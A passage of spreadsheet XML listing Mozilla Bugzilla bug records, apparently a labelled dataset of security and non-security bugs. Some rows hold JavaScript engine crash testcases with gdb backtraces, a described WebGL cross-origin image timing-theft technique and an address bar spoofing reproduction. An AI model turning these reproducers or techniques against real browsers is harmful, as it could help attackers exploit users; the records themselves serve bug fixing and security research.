      </c>
      <c r="D2627" t="inlineStr">
        <is>
          <t>2017-05-08 09:48:46 -0700</t>
        </is>
      </c>
      <c r="E2627" t="n">
        <v>1</v>
      </c>
      <c r="F2627" t="n">
        <v>1</v>
      </c>
      <c r="G2627" t="n">
        <v>5</v>
      </c>
      <c r="H2627" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2627" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J2627" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2627" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2627" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2627" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2627" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2627" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2627" t="inlineStr"/>
      <c r="Q2627" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R2627" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2627" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2627" t="n">
        <v>1</v>
      </c>
      <c r="U2627" t="n">
        <v>0</v>
      </c>
      <c r="V2627" t="n">
        <v>27</v>
      </c>
      <c r="W2627" t="inlineStr">
        <is>
          <t>Something must have changed, maybe in the bugzilla api, so that now when slave health tries to look up a problem tracking bug which doesn't exist, rather than just quickly putting up the icon for "file a new bug" like it used to, it now spins forever. That'd be fine, except apparently rebooting requires either the bug number or the certain knowledge that the bug does not exist to work properly, so for a slave which doesn't yet have a tracking bug, like https://secure.pub.build.mozilla.org/builddata/reports/slave_health/slave.html?class=test&amp;type=talos-linux64-ix&amp;name=talos-linux64-ix-006, if you try to reboot it, you just get a quick "400 Client Error: Bad Request"</t>
        </is>
      </c>
      <c r="X2627" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2628">
      <c r="A2628" t="n">
        <v>125437</v>
      </c>
      <c r="B2628" t="inlineStr">
        <is>
          <t>2002-02-13 23:20:45 -0800</t>
        </is>
      </c>
      <c r="C2628" t="inlineStr">
        <is>
          <t>crash on changing style</t>
        </is>
      </c>
      <c r="D2628" t="inlineStr">
        <is>
          <t>2002-03-18 14:12:53 -0800</t>
        </is>
      </c>
      <c r="E2628" t="n">
        <v>1</v>
      </c>
      <c r="F2628" t="n">
        <v>1</v>
      </c>
      <c r="G2628" t="n">
        <v>3</v>
      </c>
      <c r="H2628" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2628" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2628" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K2628" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2628" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2628" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N2628" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2628" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2628" t="inlineStr"/>
      <c r="Q2628" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2628" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2628" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T2628" t="n">
        <v>1</v>
      </c>
      <c r="U2628" t="n">
        <v>0</v>
      </c>
      <c r="V2628" t="n">
        <v>18</v>
      </c>
      <c r="W2628" t="inlineStr">
        <is>
          <t>Goto www.bluesnews.com on left bar select the check box for retro colors.
Crash.
Its not generating a talkback sorry. :(  (windows 2000 often doesn't is there a
trick to that?)</t>
        </is>
      </c>
      <c r="X2628" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2629">
      <c r="A2629" t="n">
        <v>1810711</v>
      </c>
      <c r="B2629" t="inlineStr">
        <is>
          <t>2023-01-17 03:49:46 -0800</t>
        </is>
      </c>
      <c r="C2629" t="inlineStr">
        <is>
          <t>Assertion failure: IsObjectValueInCompartment(v, compartment()), at js/src/vm/NativeObject.h:1083</t>
        </is>
      </c>
      <c r="D2629" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:25 -0700</t>
        </is>
      </c>
      <c r="E2629" t="n">
        <v>1</v>
      </c>
      <c r="F2629" t="n">
        <v>1</v>
      </c>
      <c r="G2629" t="n">
        <v>3</v>
      </c>
      <c r="H2629" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2629" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2629" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2629" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2629" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2629" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2629" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2629" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2629" t="inlineStr">
        <is>
          <t>[adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q2629" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2629" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S2629" t="inlineStr">
        <is>
          <t>111 Branch</t>
        </is>
      </c>
      <c r="T2629" t="n">
        <v>1</v>
      </c>
      <c r="U2629" t="n">
        <v>0</v>
      </c>
      <c r="V2629" t="n">
        <v>21</v>
      </c>
      <c r="W2629" t="inlineStr">
        <is>
          <t>The following testcase triggers an assertion failure in debug builds of Spidermonkey built from current HEAD:
    RegExp.sameZoneAs = RegExp;              
    with (this.newGlobal(RegExp)) {          
        function f3(a4, a5) {                
            async function f6(a7, a8, a9) {                                                                                                                                                                                                                                                                                                                                 
                return a4;                                                                                                                                                                                                                                                                                                                                                  
            }                                
            const v11 = ("-9").replace;      
            try {                            
                v11();                       
            } catch(e13) {                   
                const o14 = {                                                                                                                                                                                                                                                                                                                                               
                };                                                                                                                                                                                                                                                                                                                                                          
                Object.defineProperty(o14, "getPrototypeOf", { enumerable: true, value: f6 });
                const v16 = new Proxy(e13, o14);
                v16.stack;                   
            }                                
            return f3;                       
        }                                    
        const v19 = new Promise(f3);         
    }                                        
    // CRASH INFO                                                                                                                                                                     
    // ==========                                                                                                                                                                     
    // TERMSIG: 11                           
    // STDERR:                               
    // Assertion failure: IsObjectValueInCompartment(v, compartment()), at /home/builder/firefox/js/src/vm/NativeObject.h:1083
Here is a part of the backtrace from gdb:
    #0  0x0000555557525f2c in js::NativeObject::checkStoredValue (this=0x37c283201248, v=...) at js/src/vm/NativeObject.h:1083
    #1  0x000055555769b65d in js::NativeObject::setSlot (this=0x37c283201248, slot=2, value=...) at js/src/vm/NativeObject.h:1091
    #2  0x00005555576fba93 in js::EnvironmentObject::setAliasedBinding (this=0x37c283201248, slot=2, v=...) at js/src/vm/EnvironmentObject-inl.h:46
    #3  0x00005555578cafd1 in js::EnvironmentObject::setAliasedBinding (this=0x37c283201248, bi=..., v=...) at js/src/vm/EnvironmentObject-inl.h:60
    #4  0x00005555578a5971 in js::CallObject::create (cx=0x7ffff772d100, frame=...) at js/src/vm/EnvironmentObject.cpp:182
    #5  0x00005555578b50d7 in js::InitFunctionEnvironmentObjects (cx=0x7ffff772d100, frame=...) at js/src/vm/EnvironmentObject.cpp:4001
    #6  0x0000555557be104f in js::InterpreterFrame::initFunctionEnvironmentObjects (this=0x7ffff56fc1c8, cx=0x7ffff772d100) at js/src/vm/Stack.cpp:171
    #7  0x0000555557be12ad in js::InterpreterFrame::prologue (this=0x7ffff56fc1c8, cx=0x7ffff772d100) at js/src/vm/Stack.cpp:189
    #8  0x00005555576bd5ac in Interpret (cx=0x7ffff772d100, state=...) at js/src/vm/Interpreter.cpp:2131
    #9  0x00005555576bd001 in js::RunScript (cx=0x7ffff772d100, state=...) at js/src/vm/Interpreter.cpp:431
    #10 0x00005555576d4523 in js::InternalCallOrConstruct (cx=0x7ffff772d100, args=..., construct=js::NO_CONSTRUCT, reason=js::CallReason::Call) at js/src/vm/Interpreter.cpp:579
    #11 0x00005555576d4a99 in InternalCall (cx=0x7ffff772d100, args=..., reason=js::CallReason::Call) at js/src/vm/Interpreter.cpp:614
    #12 0x00005555576d4c49 in js::Call (cx=0x7ffff772d100, fval=..., thisv=..., args=..., rval=..., reason=js::CallReason::Call) at js/src/vm/Interpreter.cpp:646
    #13 0x0000555557ea4287 in js::ScriptedProxyHandler::getPrototype (this=0x5555596e1a50 &lt;js::ScriptedProxyHandler::singleton&gt;, cx=0x7ffff772d100, proxy=..., protop=...) at js/src/proxy/ScriptedProxyHandler.cpp:250
    #14 0x0000555557ea00d2 in js::Proxy::getPrototype (cx=0x7ffff772d100, proxy=..., proto=...) at js/src/proxy/Proxy.cpp:297
    #15 0x00005555578e0e1d in js::GetPrototype (cx=0x7ffff772d100, obj=..., protop=...) at js/src/vm/ObjectOperations-inl.h:50
    #16 0x00005555578baed1 in FindErrorInstanceOrPrototype (cx=0x7ffff772d100, obj=..., result=...) at js/src/vm/ErrorObject.cpp:626
    #17 0x00005555578ba890 in js::ErrorObject::getStack_impl (cx=0x7ffff772d100, args=...) at js/src/vm/ErrorObject.cpp:664
    #18 0x00005555578ba740 in JS::CallNonGenericMethod&lt;&amp;(IsObject(JS::Handle&lt;JS::Value&gt;)), &amp;js::ErrorObject::getStack_impl&gt; (cx=0x7ffff772d100, args=...) at obj-debug/dist/include/js/CallNonGenericMethod.h:103
    #19 0x00005555578ba6ac in js::ErrorObject::getStack (cx=0x7ffff772d100, argc=0, vp=0x7fffffff49a8) at js/src/vm/ErrorObject.cpp:656
    #20 0x00005555576e604c in CallJSNative (cx=0x7ffff772d100, native=0x5555578ba660 &lt;js::ErrorObject::getStack(JSContext*, unsigned int, JS::Value*)&gt;, reason=js::CallReason::Getter, args=...) at js/src/vm/Interpreter.cpp:459
    #21 0x00005555576d4313 in js::InternalCallOrConstruct (cx=0x7ffff772d100, args=..., construct=js::NO_CONSTRUCT, reason=js::CallReason::Getter) at js/src/vm/Interpreter.cpp:547
    #22 0x00005555576d4a99 in InternalCall (cx=0x7ffff772d100, args=..., reason=js::CallReason::Getter) at js/src/vm/Interpreter.cpp:614
    #23 0x00005555576d4c49 in js::Call (cx=0x7ffff772d100, fval=..., thisv=..., args=..., rval=..., reason=js::CallReason::Getter) at js/src/vm/Interpreter.cpp:646
    #24 0x00005555576d59d7 in js::CallGetter (cx=0x7ffff772d100, thisv=..., getter=..., rval=...) at js/src/vm/Interpreter.cpp:768
    #25 0x0000555557a0f32a in CallGetter (cx=0x7ffff772d100, obj=..., receiver=..., id=..., prop=..., vp=...) at js/src/vm/NativeObject.cpp:2017
I'm not sure if this assertion failure has security implications, so I'm filing this as a security issue as a precaution.</t>
        </is>
      </c>
      <c r="X2629" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2630">
      <c r="A2630" t="n">
        <v>458679</v>
      </c>
      <c r="B2630" t="inlineStr">
        <is>
          <t>2008-10-05 23:51:05 -0700</t>
        </is>
      </c>
      <c r="C2630" t="inlineStr">
        <is>
          <t>Crash [@ js_DeflateString]</t>
        </is>
      </c>
      <c r="D2630" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:47 -0700</t>
        </is>
      </c>
      <c r="E2630" t="n">
        <v>1</v>
      </c>
      <c r="F2630" t="n">
        <v>1</v>
      </c>
      <c r="G2630" t="n">
        <v>3</v>
      </c>
      <c r="H2630" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2630" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2630" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2630" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2630" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2630" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N2630" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2630" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2630" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q2630" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2630" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2630" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2630" t="n">
        <v>1</v>
      </c>
      <c r="U2630" t="n">
        <v>0</v>
      </c>
      <c r="V2630" t="n">
        <v>45</v>
      </c>
      <c r="W2630" t="inlineStr">
        <is>
          <t>Created attachment 341891
crash log
function f()
{
  for (var i = 1; i &lt; dps.length; ++i) {
    var a = "";
    var b = "";
    var c = "";
  }
}
function stringOfLength(n)
{
  if (n == 0) {
    return "";
  } else if (n == 1) {
    return "\"";
  } else {
    var r = n % 2;
    var d = (n - r) / 2;
    var y = stringOfLength(d);
    return y + y + stringOfLength(r);
  }    
}
this.__defineGetter__('x', this.toSource);
while (x.length &lt; 12000000) { 
  let q = x;
  s = q + q; 
}
print(x.length);
&lt;e4x&gt;{x}&lt;/e4x&gt;;
Huge thanks to Jesse Ruderman for helping to reduce this massive testcase. These lines crash js trunk shell at 0x0000000006b30000.
This also asserts debug shell at "Assertion failure: nbytes != 0, at jsapi.cpp:1841". Related to bug 421623 or bug 457521?
Nominating security sensitive because they crash at this scary address. Nominating wanted-1.9.0.x as well because we have seen variants of this testcase crashing 1.9.0.x.</t>
        </is>
      </c>
      <c r="X2630" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2631">
      <c r="A2631" t="n">
        <v>485217</v>
      </c>
      <c r="B2631" t="inlineStr">
        <is>
          <t>2009-03-25 11:31:16 -0700</t>
        </is>
      </c>
      <c r="C2631" t="inlineStr">
        <is>
          <t>Exploitable crash in [@txMozillaXSLTProcessor::TransformToDoc ]</t>
        </is>
      </c>
      <c r="D2631" t="inlineStr">
        <is>
          <t>2010-09-19 23:21:31 -0700</t>
        </is>
      </c>
      <c r="E2631" t="n">
        <v>1</v>
      </c>
      <c r="F2631" t="n">
        <v>1</v>
      </c>
      <c r="G2631" t="n">
        <v>3</v>
      </c>
      <c r="H2631" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2631" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2631" t="inlineStr">
        <is>
          <t>XSLT</t>
        </is>
      </c>
      <c r="K2631" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2631" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2631" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2631" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2631" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2631" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2631" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2631" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2631" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T2631" t="n">
        <v>1</v>
      </c>
      <c r="U2631" t="n">
        <v>0</v>
      </c>
      <c r="V2631" t="n">
        <v>31</v>
      </c>
      <c r="W2631" t="inlineStr">
        <is>
          <t>Found on security focus, not sure where the original came from. Exploit code at the link iframes a little xml file with an xslt transform that causes a crash reliably on 3.0 branch and trunk (and presumably 1.9.1, didn't test).  Null, but it's being called, assuming the worst for the moment.
Mac 3.0 crash report: http://crash-stats.mozilla.com/report/index/73cd82a1-6465-4ca2-9467-ef4982090325?p=1</t>
        </is>
      </c>
      <c r="X2631" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2632">
      <c r="A2632" t="n">
        <v>730420</v>
      </c>
      <c r="B2632" t="inlineStr">
        <is>
          <t>2012-02-24 13:00:01 -0800</t>
        </is>
      </c>
      <c r="C2632" t="inlineStr">
        <is>
          <t>Registration should mention that the Username will be public</t>
        </is>
      </c>
      <c r="D2632" t="inlineStr">
        <is>
          <t>2013-01-31 06:02:31 -0800</t>
        </is>
      </c>
      <c r="E2632" t="n">
        <v>1</v>
      </c>
      <c r="F2632" t="n">
        <v>1</v>
      </c>
      <c r="G2632" t="n">
        <v>5</v>
      </c>
      <c r="H2632" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I2632" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J2632" t="inlineStr">
        <is>
          <t>Users and Groups</t>
        </is>
      </c>
      <c r="K2632" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2632" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2632" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2632" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2632" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2632" t="inlineStr">
        <is>
          <t>u=user c=questions p=0 s=2013.2</t>
        </is>
      </c>
      <c r="Q2632" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R2632" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2632" t="inlineStr">
        <is>
          <t>2013Q1</t>
        </is>
      </c>
      <c r="T2632" t="n">
        <v>1</v>
      </c>
      <c r="U2632" t="n">
        <v>0</v>
      </c>
      <c r="V2632" t="n">
        <v>17</v>
      </c>
      <c r="W2632" t="inlineStr">
        <is>
          <t>During the registration, we need to inform users the username is intended to be public and adding a link to the privacy policy. 
This bug needs further input from Privacy and some UI work.</t>
        </is>
      </c>
      <c r="X2632" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2633">
      <c r="A2633" t="n">
        <v>655987</v>
      </c>
      <c r="B2633" t="inlineStr">
        <is>
          <t>2011-05-10 04:56:59 -0700</t>
        </is>
      </c>
      <c r="C2633" t="inlineStr">
        <is>
          <t>Respond to the WebGL cross-domain image theft vulnerability</t>
        </is>
      </c>
      <c r="D2633" t="inlineStr">
        <is>
          <t>2011-08-26 05:12:59 -0700</t>
        </is>
      </c>
      <c r="E2633" t="n">
        <v>1</v>
      </c>
      <c r="F2633" t="n">
        <v>1</v>
      </c>
      <c r="G2633" t="n">
        <v>3</v>
      </c>
      <c r="H2633" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2633" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2633" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K2633" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2633" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2633" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2633" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2633" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2633" t="inlineStr">
        <is>
          <t>[sg:high] (moderate in practice?) [656277 has a fix potentially for 5 and 6][testday-20110826]</t>
        </is>
      </c>
      <c r="Q2633" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2633" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2633" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2633" t="n">
        <v>1</v>
      </c>
      <c r="U2633" t="n">
        <v>0</v>
      </c>
      <c r="V2633" t="n">
        <v>30</v>
      </c>
      <c r="W2633" t="inlineStr">
        <is>
          <t>Proof-of-concept:
http://www.contextis.co.uk/resources/blog/webgl/poc/index.html
The proof-of-concept consists in loading a cross-domain image as a WebGL texture, and rendering each pixel using a shader program that takes an amount of time proportional to the R, G, B values of pixels. By timing this, they get an approximation of the image.
The attacker has to make a compromise between image quality and time. The higher the wanted quality, the longer it takes to steal.
The biggest hurdle that an attacker faces is that it's usually hard to know the URLs of sensitive images to steal. If the attacker knows URLs to steal and is able to get users to run WebGL scripts, if some users will stay long enough on his page (between 1 and 30 minutes needed depending on image size/quality), he can steal their images with that technique.</t>
        </is>
      </c>
      <c r="X2633" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2634">
      <c r="A2634" t="n">
        <v>1470732</v>
      </c>
      <c r="B2634" t="inlineStr">
        <is>
          <t>2018-06-24 01:31:08 -0700</t>
        </is>
      </c>
      <c r="C2634" t="inlineStr">
        <is>
          <t>Crash [@ mozilla::LinkedListElement&lt;js::jit::IonBuilder&gt;::setNextUnsafe] or Hit MOZ_CRASH(Tried to access a protected region!) with evalInWorker</t>
        </is>
      </c>
      <c r="D2634" t="inlineStr">
        <is>
          <t>2018-07-05 08:17:20 -0700</t>
        </is>
      </c>
      <c r="E2634" t="n">
        <v>1</v>
      </c>
      <c r="F2634" t="n">
        <v>1</v>
      </c>
      <c r="G2634" t="n">
        <v>3</v>
      </c>
      <c r="H2634" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2634" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2634" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2634" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2634" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M2634" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2634" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2634" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2634" t="inlineStr">
        <is>
          <t>[fuzzblocker] [jsbugmon:update,bisect,ignore]</t>
        </is>
      </c>
      <c r="Q2634" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2634" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2634" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T2634" t="n">
        <v>1</v>
      </c>
      <c r="U2634" t="n">
        <v>0</v>
      </c>
      <c r="V2634" t="n">
        <v>24</v>
      </c>
      <c r="W2634" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 368ae05266bd (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-profiling --enable-debug --enable-optimize, run with --fuzzing-safe --cpu-count=2 --ion-eager):
while(true) {
  evalInWorker(`
    setJitCompilerOption("baseline.warmup.trigger", 10);
  `);
  let m = parseModule("");
  m.declarationInstantiation();
}
Backtrace:
received signal SIGSEGV, Segmentation fault.
#0  mozilla::LinkedListElement&lt;js::jit::IonBuilder&gt;::setNextUnsafe (aElem=0x7ffff5381270, this=0x7ffff5f072b0) at dist/include/mozilla/LinkedList.h:336
#1  mozilla::LinkedList&lt;js::jit::IonBuilder&gt;::insertFront (aElem=0x7ffff5381270, this=&lt;optimized out&gt;) at dist/include/mozilla/LinkedList.h:465
#2  js::jit::JitRuntime::ionLazyLinkListAdd (this=0x7ffff5f07000, rt=0x7ffff5f19000, builder=0x7ffff5381270) at js/src/jit/Ion.cpp:375
#3  0x00000000007a47d4 in js::jit::MoveFinshedBuildersToLazyLinkList (lock=..., rt=0x7ffff5f19000) at js/src/jit/Ion.cpp:1929
#4  js::jit::AttachFinishedCompilations (cx=cx@entry=0x7ffff5f17000) at js/src/jit/Ion.cpp:1961
#5  0x0000000000c6f70c in HandleInterrupt (cx=0x7ffff5f17000, invokeCallback=false) at js/src/vm/Runtime.cpp:431
#6  0x00001d6be56d3a16 in ?? ()
#7  0x0000000000000000 in ?? ()
rax	0x7ffff5381388	140737307480968
rbx	0x7ffff5381270	140737307480688
rcx	0x7ffff5381201	140737307480577
rdx	0x7ffff55452d8	140737309332184
rsi	0x7ffff5f19001	140737319636993
rdi	0x7ffff5f072b0	140737319563952
rbp	0x7fffffffc350	140737488339792
rsp	0x7fffffffc330	140737488339760
r8	0x7ffff5f17118	140737319629080
r9	0x7ffff5f17030	140737319628848
r10	0x7fffffffc3d0	140737488339920
r11	0x7ffff5564400	140737309459456
r12	0x7ffff5f07000	140737319563264
r13	0x7ffff5f19000	140737319636992
r14	0x7ffff5f19000	140737319636992
r15	0x7fffffffc3c0	140737488339904
rip	0x739d3b &lt;js::jit::JitRuntime::ionLazyLinkListAdd(JSRuntime*, js::jit::IonBuilder*)+187&gt;
=&gt; 0x739d3b &lt;js::jit::JitRuntime::ionLazyLinkListAdd(JSRuntime*, js::jit::IonBuilder*)+187&gt;:	mov    %rdi,0x120(%rbx)
   0x739d42 &lt;js::jit::JitRuntime::ionLazyLinkListAdd(JSRuntime*, js::jit::IonBuilder*)+194&gt;:	mov    %rdx,0x118(%rbx)
This is a critical fuzzblocker, disabling all evalInWorker testing until resolved.</t>
        </is>
      </c>
      <c r="X2634" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2635">
      <c r="A2635" t="n">
        <v>1284372</v>
      </c>
      <c r="B2635" t="inlineStr">
        <is>
          <t>2016-07-04 19:42:51 -0700</t>
        </is>
      </c>
      <c r="C2635" t="inlineStr">
        <is>
          <t>Firefox Mobile Address Bar Spoofing</t>
        </is>
      </c>
      <c r="D2635" t="inlineStr">
        <is>
          <t>2024-05-30 09:18:55 -0700</t>
        </is>
      </c>
      <c r="E2635" t="n">
        <v>1</v>
      </c>
      <c r="F2635" t="n">
        <v>1</v>
      </c>
      <c r="G2635" t="n">
        <v>6</v>
      </c>
      <c r="H2635" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2635" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J2635" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K2635" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L2635" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2635" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2635" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2635" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2635" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q2635" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2635" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2635" t="inlineStr">
        <is>
          <t>Firefox 50</t>
        </is>
      </c>
      <c r="T2635" t="n">
        <v>1</v>
      </c>
      <c r="U2635" t="n">
        <v>0</v>
      </c>
      <c r="V2635" t="n">
        <v>22</v>
      </c>
      <c r="W2635" t="inlineStr">
        <is>
          <t>Created attachment 8767818
spoofed1.png
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Firefox for Android
Steps to reproduce:
- Visit - https://jsfiddle.net/ktfegrhf/3/ using latest version of Firefox Mobile 
- Click on the link and observe the URL 
Actual results:
Due to mishandling of arabic RTL characters firefox for mobile causes the complete URL to be displayed from Right to left instead of left to right. 
Expected results:
The URL should be been displayed from LTR:
Expected Result:
http://عربي.امارات/google.com/test/test/test
Rendered Results
google.com/test/test/test/عربي.امارات
This is perfectly fine on firefox for mobile</t>
        </is>
      </c>
      <c r="X2635" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2636">
      <c r="A2636" t="n">
        <v>567059</v>
      </c>
      <c r="B2636" t="inlineStr">
        <is>
          <t>2010-05-19 22:59:56 -0700</t>
        </is>
      </c>
      <c r="C2636" t="inlineStr">
        <is>
          <t>Crash [@ js_LookupPropertyWithFlags] or "Assertion failure: isNative(),"</t>
        </is>
      </c>
      <c r="D2636" t="inlineStr">
        <is>
          <t>2013-03-11 11:24:26 -0700</t>
        </is>
      </c>
      <c r="E2636" t="n">
        <v>1</v>
      </c>
      <c r="F2636" t="n">
        <v>1</v>
      </c>
      <c r="G2636" t="n">
        <v>3</v>
      </c>
      <c r="H2636" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2636" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2636" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2636" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2636" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2636" t="inlineStr">
        <is>
